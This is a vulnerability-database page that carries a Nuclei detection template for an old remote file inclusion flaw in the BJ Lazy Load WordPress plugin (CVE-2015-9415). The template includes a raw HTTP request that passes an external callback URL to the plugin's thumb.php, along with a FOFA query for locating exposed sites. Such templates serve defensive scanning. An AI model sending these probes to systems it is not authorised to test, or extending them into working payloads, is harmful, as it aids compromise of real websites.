Lucene search
K

BJ Lazy Load (Timthumb) <= 0.7.5 - Remote File Inclusion

🗓️ 18 Jun 2026 03:02:43Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

BJ Lazy Load WordPress plugin up to 0.7.5 allows remote file inclusion via TimThumb; fixed in 1.0.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2015-9415
26 Sep 201909:01
circl
CNVD
WordPress bj-lazy-load plugin remote file inclusion vulnerability
25 Sep 201900:00
cnvd
CVE
CVE-2015-9415
25 Sep 201923:31
cve
Cvelist
CVE-2015-9415
25 Sep 201923:31
cvelist
EUVD
EUVD-2015-9255
25 Sep 201923:31
euvd
NVD
CVE-2015-9415
26 Sep 201900:15
nvd
Prion
Remote file inclusion
26 Sep 201900:15
prion
RedhatCVE
CVE-2015-9415
22 May 202509:33
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2015-9415
2 Sep 201500:00
vulncheck_kev
WPVulnDB
BJ Lazy Load <= 0.7.5 - Remote File Inclusion (Timthumb)
2 Sep 201500:00
wpvulndb
Rows per page
id: CVE-2015-9415

info:
  name: BJ Lazy Load (Timthumb) <= 0.7.5 - Remote File Inclusion
  author: s4e-io
  severity: high
  description: |
    The BJ Lazy Load plugin v0.7.5 for WordPress has a Remote File Inclusion vulnerability via TimThumb.
  impact: |
    Attackers can include and execute remote malicious files, potentially leading to remote code execution and complete site compromise.
  remediation: Fixed in 1.0
  reference:
    - https://wpscan.com/vulnerability/c15aef94-822d-40eb-80a6-e4a0611cb5c1/
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bj-lazy-load/bj-lazy-load-10-remote-file-inclusion-via-timthumb
    - https://nvd.nist.gov/vuln/detail/CVE-2015-9415
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 7.5
    cve-id: CVE-2015-9415
    cwe-id: CWE-20
    epss-score: 0.03399
    epss-percentile: 0.87282
    cpe: cpe:2.3:a:angrycreative:bj_lazy_load:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: angrycreative
    product: bj_lazy_load
    framework: wordpress
    fofa-query: body="/wp-content/plugins/bj-lazy-load"
  tags: cve,cve2015,wp,wp-plugin,wordpress,wpscan,bj-lazy-load,rfi,vkev,vuln

flow: http(1) || http(2)

http:
  - raw:
      - | #if set true in bj-lazy-load/inc/timthumb.php ALLOW_ALL_EXTERNAL_SITES option
        GET /wp-content/plugins/bj-lazy-load/thumb.php?src=http://{{interactsh-url}}/{{rand_base(16)}}.jpg HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 400'
          - 'contains(body, "TimThumb Error")'
          - 'contains(interactsh_protocol, "http")'
        condition: and

  - raw:
      - | #default plugin settings
        GET /wp-content/plugins/bj-lazy-load/thumb.php?src=http://img.youtube.com/{{rand_base(16)}}.jpg HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "gd-jpeg")'
          - 'contains(content_type, "image/jpeg")'
        condition: and
# digest: 4a0a0047304502201c333c1be188b5c74a44431b2e9f39451059a84fb683f23e6d45c784811d2a580221009029bacdda671e3ad726be8e42195f370702c0854603555e745928f2a579ca54:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 25
CVSS 3.17.5
EPSS0.03399
10